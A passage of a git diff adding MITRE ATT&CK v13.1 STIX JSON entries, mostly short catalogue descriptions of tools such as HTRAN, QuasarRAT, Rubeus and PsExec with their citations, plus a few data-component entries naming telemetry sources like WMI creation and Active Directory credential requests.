@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5897bccb-367e-4dc6-9cfa-9428f9802592", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HTRAN", + "HUC Packet Transmit Tool" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--d5e96a35-7b0b-4c6a-9533-d63ecbda563e", + "type": "tool", + "created": "2017-05-31T21:32:32.011Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0040", + "external_id": "S0040" + }, + { + "source_name": "HUC Packet Transmit Tool", + "description": "(Citation: Operation Quantum Entanglement)" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "description": "Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015.", + "source_name": "Operation Quantum Entanglement" + }, + { + "description": "The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. 
Retrieved March 11, 2019.", + "url": "https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools", + "source_name": "NCSC Joint Report Public Tools" + } + ], + "modified": "2021-04-23T20:04:19.262Z", + "name": "HTRAN", + "description": "[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153.json new file mode 100644 index 0000000000000000000000000000000000000000..c32eef36ae6e8f41523bda2a25add67f6fafa5dd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--6c3e49c5-df78-445a-95c4-44f76fec28e1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SDelete" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0195", + "external_id": "S0195" + }, + { + "source_name": "SDelete", + "description": "(Citation: Microsoft SDelete July 2016)" + }, + { + "source_name": "Microsoft SDelete July 2016", + "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" + } + ], + "modified": "2020-08-12T21:37:53.804Z", + "name": "SDelete", + "description": "[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--da04ac30-27da-4959-a67d-450ce47d9470.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--da04ac30-27da-4959-a67d-450ce47d9470.json new file mode 100644 index 0000000000000000000000000000000000000000..ccedf48fb5eabbb10fe0c5a119fb4be74619bc9e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--da04ac30-27da-4959-a67d-450ce47d9470.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--adb274d1-97a4-4d94-92ab-3aadc7ce8052", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "x_mitre_aliases": [ + "QuasarRAT", + "xRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--da04ac30-27da-4959-a67d-450ce47d9470", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0262", + "url": "https://attack.mitre.org/software/S0262" + }, + { + "source_name": "QuasarRAT", + "description": "(Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) (Citation: TrendMicro Patchwork Dec 2017)" + }, + { + "source_name": "xRAT", + "description": "(Citation: TrendMicro Patchwork Dec 2017)(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021." + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018." + }, + { + "source_name": "GitHub QuasarRAT", + "url": "https://github.com/quasar/QuasarRAT", + "description": "MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018." 
+ }, + { + "source_name": "Volexity Patchwork June 2018", + "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)", + "modified": "2022-08-02T15:36:30.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "QuasarRAT", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--e33267fe-099f-4af2-8730-63d49f8813b2.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--e33267fe-099f-4af2-8730-63d49f8813b2.json new file mode 100644 index 0000000000000000000000000000000000000000..ae7e5558543f832cdcb6a03100f6ecee47323168 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--e33267fe-099f-4af2-8730-63d49f8813b2.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--8fd8c84f-2b90-426a-bdec-27772d070ae9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T23:27:32.465Z", + "name": "Rubeus", + "description": "[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Mayuresh Dani, Qualys", + "Akshat Pradhan, Qualys" + ], + "x_mitre_aliases": [ + "Rubeus" + ], + "type": "tool", + "id": "tool--e33267fe-099f-4af2-8730-63d49f8813b2", + "created": "2023-03-29T20:19:26.940Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1071", + "external_id": "S1071" + }, + { + "source_name": "GitHub Rubeus March 2023", + "description": "Harmj0y. (n.d.). Rubeus. Retrieved March 29, 2023.", + "url": "https://github.com/GhostPack/Rubeus" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. 
Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + }, + { + "source_name": "DFIR Ryuk's Return October 2020", + "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.", + "url": "https://thedfirreport.com/2020/10/08/ryuks-return/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68.json new file mode 100644 index 0000000000000000000000000000000000000000..fc65016e4f61126b6db91800dc41a14fecb5811a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--992cb0ee-03d3-492c-af95-cf930acc958b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-05T16:37:49.999Z", + "name": "Tor", + "description": "[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Tor" + ], + "type": "tool", + "id": "tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0183", + "external_id": "S0183" + }, + { + "source_name": "Tor", + "description": "(Citation: Dingledine Tor The Second-Generation Onion Router)" + }, + { + "source_name": "Dingledine Tor The Second-Generation Onion Router", + "description": "Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. 
Retrieved December 21, 2017.", + "url": "http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f59508a6-3615-47c3-b493-6676e1a39a87.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f59508a6-3615-47c3-b493-6676e1a39a87.json new file mode 100644 index 0000000000000000000000000000000000000000..bea2df66428dcd0d25cf6d342b0c589b1e252314 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f59508a6-3615-47c3-b493-6676e1a39a87.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--b639c4a7-b9f4-499a-bd62-2aa97461407a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-02T20:44:17.690Z", + "name": "AdFind", + "description": "[AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "AdFind" + ], + "type": "tool", + "id": "tool--f59508a6-3615-47c3-b493-6676e1a39a87", + "created": "2020-12-28T18:35:50.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0552", + "external_id": "S0552" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). 
Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a.json new file mode 100644 index 0000000000000000000000000000000000000000..03c447ba545ebe7eddacd6e18bb7731c2384f0b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--174170c3-85f4-48d9-8967-02c85a79f687", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:45:16.377Z", + "name": "Wevtutil", + "description": "[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Viren Chaudhari, Qualys", + "Harshal Tupsamudre, Qualys" + ], + "x_mitre_aliases": [ + "Wevtutil" + ], + "type": "tool", + "id": "tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a", + "created": "2021-09-14T21:45:30.280Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0645", + "external_id": "S0645" + }, + { + "source_name": "Wevtutil Microsoft Documentation", + "description": "Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5.json new file mode 100644 index 0000000000000000000000000000000000000000..dde00f9bae36569b69f8a196c3e82ab4df3c7ac1 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--dee8a73a-df15-4d92-9871-fc55861b7f7d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0224", + "external_id": "S0224" + }, + { + "source_name": "Check Point Havij Analysis", + "description": "Ganani, M. (2015, May 14). Analysis of the Havij SQL Injection tool. Retrieved March 19, 2018.", + "url": "https://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Havij", + "description": "[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db.json new file mode 100644 index 0000000000000000000000000000000000000000..139606ed50882b5ec52f91ff4ae3a52f19d8576a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--218cbac8-5528-4b51-a6b8-3bc9811cd385", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-02T20:43:41.287Z", + "name": "PsExec", + "description": "[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Janantha Marasinghe" + ], + "x_mitre_aliases": [ + "PsExec" + ], + "type": "tool", + "id": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "created": "2017-05-31T21:32:21.771Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0029", + "external_id": "S0029" + }, + { + "source_name": "SANS PsExec", + "description": "Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.", + "url": "https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/" + }, + { + "source_name": "Russinovich Sysinternals", + "description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc.json new file mode 100644 index 0000000000000000000000000000000000000000..705559c53720d8da4bdd5b4e809add9168a1ed81 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--f6d34ddd-cf38-402c-be0d-2a691a013485", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--02d090b6-8157-48da-98a2-517f7edd49fc", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Active Directory Credential Request", + "description": "A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)", + "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4.json new file mode 100644 index 0000000000000000000000000000000000000000..dccdd662b963515b84e78d32db1462b04370da74 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--2072eae2-8174-451a-82b3-25f657817ac5", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--05645013-2fed-4066-8bdc-626b2e201dd4", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "WMI Creation", + "description": "Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)", + "x_mitre_data_source_ref": "x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5.json new file mode 100644 index 0000000000000000000000000000000000000000..3afbc0db9c294b2c29f100fb2449520ac30c19e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--de9d9598-54a5-4f3b-b607-034b6f0534f9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Group Modification", + "description": "Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup)", + "x_mitre_data_source_ref": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963.json new file mode 100644 index 0000000000000000000000000000000000000000..cc8e9972621ba1a7fb247f34c53944154db66262 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--a3b82746-fe9b-4746-b715-f084e7fc7009", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--071a09b1-8945-46fd-8bb7-6bcc89400963", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Image Modification", + "description": "Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)", + "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0.json new file mode 100644 index 0000000000000000000000000000000000000000..43db075ed4df82a9c5bbdb092b8182e0c69ffb42 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0.json 
